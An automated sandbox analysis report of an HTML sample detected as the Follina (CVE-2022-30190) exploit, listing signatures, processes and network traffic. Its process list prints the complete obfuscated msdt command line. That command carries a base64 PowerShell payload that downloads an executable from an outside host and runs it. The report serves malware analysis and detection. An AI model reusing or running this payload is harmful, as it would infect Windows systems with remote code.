Windows
Analysis Report
1024203777.test.html
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 2040 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" --sta rt-maximiz ed "about: blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - chrome.exe (PID: 5872 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-G B --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =1936 --fi eld-trial- handle=170 0,i,992303 3970500120 582,122508 6154909334 9672,13107 2 /prefetc h:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408) - msdt.exe (PID: 5908 cmdline:
"C:\Window s\system32 \msdt.exe" ms-msdt:/ ID%20PCwdI AGnOSTic%2 0-skiP%20f Orce%20-PA raM%20%22I t_rEbrOwsE ForFILE=#7 qnxE3%20IT _LaunchMet hod=Contex tMenu%20IT _BrowseFor File=Aq$(i EX($(iEX(' [SysTEm.TE Xt.eNcOdin G]'+[chAr] 58+[cHAr]5 8+'utF8.ge tstrING([s ysTem.coNv erT]'+[CHa R]0X3a+[Ch Ar]0X3A+'F RomBasE64s TrIng('+[c HAR]34+'c1 RvUC1wck9j RXNzIC1mb3 JDRSAtbmFN RSAnbXNkdC c7JEsgPSBh RGQtdFlwZS AtTUVtQmVS ZGVGaU5JdG lPTiAnW0Rs bEltcG9ydC gidVJsbW9O LkRMbCIsIE NoYXJTZXQg PSBDaGFyU2 V0LlVuaWNv ZGUpXXB1Ym xpYyBzdGF0 aWMgZXh0ZX JuIEludFB0 ciBVUkxEb3 dubG9hZFRv RmlsZShJbn RQdHIgZnFt LHN0cmluZy BELHN0cmlu ZyBFTyx1aW 50IHVsLElu dFB0ciB0KT snIC1uYW1F ICJ6IiAtbk FtRVNQYWNF IE0gLVBhc3 NUaHJ1OyAk Szo6VVJMRG 93bmxvYWRU b0ZpbGUoMC wiaHR0cHM6 Ly9ldmVudG 9yZ2FuaXpl ci5way9uZX diaXRoZXJl MjAwNTRyZm RzLmV4ZSIs IiRFTlY6QV BQREFUQVxB bnlOYW1lLm V4ZSIsMCww KTtzdEFSdC 1TbEVFcCgz KTtyVU5EbG wzMi5leEUg emlwZmxkci 5kbGwsUm91 dGVUaGVDYW xsICIkZU5W OkFQUERBVE FcQW55TmFt ZS5leGUiO1 NUT3AtUFJv Q2VzUyAtZk 9yQ0UgLW5h TUUgJ3NkaW Fnbmhvc3Qn '+[chAR]0x 22+'))'))) )Y/../../. ./../../.. /../../../ ../../.EXE %20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 6352 cmdline:
C:\Program Files\Goo gle\Chrome \Applicati on\chrome. exe" "C:\U sers\user\ Desktop\10 24203777.t est.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Directory created: | Jump to behavior |
Source: | IP Address: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | Virustotal: |
Source: | File created: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Classification label: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | File opened: | Jump to behavior |
Source: | Window detected: |
Source: | Directory created: | Jump to behavior |
Source: | Window / User API: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Application Window Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 4 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 1 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | |||
10% | Virustotal | Browse |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.215.237 | true | false | high | |
www.google.com | 172.217.168.36 | true | false | high | |
clients.l.google.com | 172.217.168.78 | true | false | high | |
clients2.google.com | unknown | unknown | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false | |
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.1 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696527 |
Start date and time: | 2022-09-02 13:43:41 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 36s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | 1024203777.test.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Without Instrumentation |
Number of analysed new started processes analysed: | 21 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.winHTML@38/0@6/6 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 142.250.203.106, 172.217.168.67
- Excluded domains from analysis (whitelisted): eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r3---sn-4g5edn6k.gvt1.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, r3---sn-4g5edndz.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
239.255.255.250 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
File type: | |
Entropy (8bit): | 6.048046902595105 |
TrID: | |
File name: | 1024203777.test.html |
File size: | 19364 |
MD5: | c389f7ee1d9e6376b7d96e80d7a1ffe1 |
SHA1: | 2d0b931cf7cecddddb35457a5719353840f8ca66 |
SHA256: | 8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da |
SHA512: | 7de15cf2ed560a6ff7e7fd5d3c8b0e4f13ca585bab09d40e89785fc12f5b4c79d9f4cec4034b3f40f4ca54abab100e27947867558dbc7876366a8b614eea0ffc |
SSDEEP: | 384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW |
TLSH: | C092C0E9EECC15EB09D1E230F66438DC05A60D4B117A21914CAF3EAD8FCD7535C1A6B1 |
File Content Preview: | <!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:44:45.298142910 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.298190117 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.298266888 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.298594952 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.298614979 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.302855968 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.302901983 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.303025961 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.303272009 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.303383112 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.356822014 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.357728004 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.357767105 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.359915972 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:45.360013008 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:45.365551949 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.397695065 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.397739887 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.398715973 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.398741007 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.398847103 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:45.399993896 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:45.400103092 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.480348110 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.480611086 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.480916977 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.480954885 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.481775045 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.481990099 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.482475042 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.482487917 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.537067890 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.537244081 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.537256002 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:46.537322044 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.551109076 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.551202059 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.551211119 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.551255941 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.557853937 CEST | 49737 | 443 | 192.168.2.4 | 216.58.215.237 |
Sep 2, 2022 13:44:46.557879925 CEST | 443 | 49737 | 216.58.215.237 | 192.168.2.4 |
Sep 2, 2022 13:44:46.558527946 CEST | 49738 | 443 | 192.168.2.4 | 172.217.168.78 |
Sep 2, 2022 13:44:46.558537006 CEST | 443 | 49738 | 172.217.168.78 | 192.168.2.4 |
Sep 2, 2022 13:44:47.856543064 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.856575012 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.856664896 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.868709087 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.868736982 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.927571058 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.935904980 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.935935020 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.937294006 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:47.937356949 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.941312075 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:47.941577911 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:48.147372961 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:48.147465944 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:57.922693968 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:57.922867060 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:44:57.922975063 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:59.333468914 CEST | 49741 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:44:59.333524942 CEST | 443 | 49741 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.840552092 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.840643883 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.840753078 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.841257095 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.841281891 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.891971111 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.947191000 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.947251081 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.947819948 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:48.948422909 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:48.948534012 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:49.058383942 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:45:58.924508095 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:58.924648046 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:45:58.925008059 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:44.084222078 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:44.084563971 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.020622969 CEST | 49785 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.020781040 CEST | 443 | 49785 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.021688938 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.022022963 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.022471905 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.023252964 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.023299932 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.080158949 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.080512047 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.080538034 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.080985069 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.081543922 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:48.081640959 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:48.233598948 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:46:58.100610018 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:58.100716114 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Sep 2, 2022 13:46:58.100817919 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:47:43.113172054 CEST | 49820 | 443 | 192.168.2.4 | 172.217.168.36 |
Sep 2, 2022 13:47:43.113212109 CEST | 443 | 49820 | 172.217.168.36 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 13:44:45.275023937 CEST | 52239 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:45.278227091 CEST | 56807 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:45.295929909 CEST | 53 | 56807 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:44:45.301316977 CEST | 53 | 52239 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:44:47.649152040 CEST | 59444 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:47.669023037 CEST | 53 | 59444 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:44:47.771469116 CEST | 64906 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:44:47.789319038 CEST | 53 | 64906 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:45:48.566984892 CEST | 63001 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:45:48.587142944 CEST | 53 | 63001 | 8.8.8.8 | 192.168.2.4 |
Sep 2, 2022 13:45:48.815646887 CEST | 65133 | 53 | 192.168.2.4 | 8.8.8.8 |
Sep 2, 2022 13:45:48.835638046 CEST | 53 | 65133 | 8.8.8.8 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 2, 2022 13:44:45.275023937 CEST | 192.168.2.4 | 8.8.8.8 | 0x32c7 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:44:45.278227091 CEST | 192.168.2.4 | 8.8.8.8 | 0x958d | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:44:47.649152040 CEST | 192.168.2.4 | 8.8.8.8 | 0x4111 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:44:47.771469116 CEST | 192.168.2.4 | 8.8.8.8 | 0xbc9c | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:45:48.566984892 CEST | 192.168.2.4 | 8.8.8.8 | 0x5c52 | Standard query (0) | A (IP address) | IN (0x0001) | |
Sep 2, 2022 13:45:48.815646887 CEST | 192.168.2.4 | 8.8.8.8 | 0xe61c | Standard query (0) | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 2, 2022 13:44:45.295929909 CEST | 8.8.8.8 | 192.168.2.4 | 0x958d | No error (0) | 216.58.215.237 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:44:45.301316977 CEST | 8.8.8.8 | 192.168.2.4 | 0x32c7 | No error (0) | clients.l.google.com | CNAME (Canonical name) | IN (0x0001) | ||
Sep 2, 2022 13:44:45.301316977 CEST | 8.8.8.8 | 192.168.2.4 | 0x32c7 | No error (0) | 172.217.168.78 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:44:47.669023037 CEST | 8.8.8.8 | 192.168.2.4 | 0x4111 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:44:47.789319038 CEST | 8.8.8.8 | 192.168.2.4 | 0xbc9c | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:45:48.587142944 CEST | 8.8.8.8 | 192.168.2.4 | 0x5c52 | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) | ||
Sep 2, 2022 13:45:48.835638046 CEST | 8.8.8.8 | 192.168.2.4 | 0xe61c | No error (0) | 172.217.168.36 | A (IP address) | IN (0x0001) |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.4 | 49738 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:44:46 UTC | 0 | OUT | |
2022-09-02 11:44:46 UTC | 1 | IN | |
2022-09-02 11:44:46 UTC | 2 | IN | |
2022-09-02 11:44:46 UTC | 2 | IN | |
2022-09-02 11:44:46 UTC | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.4 | 49737 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 11:44:46 UTC | 0 | OUT | |
2022-09-02 11:44:46 UTC | 1 | OUT | |
2022-09-02 11:44:46 UTC | 2 | IN | |
2022-09-02 11:44:46 UTC | 4 | IN | |
2022-09-02 11:44:46 UTC | 4 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 13:44:39 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 1 |
Start time: | 13:44:42 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 2 |
Start time: | 13:44:43 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff683680000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 5 |
Start time: | 13:45:14 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ef550000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
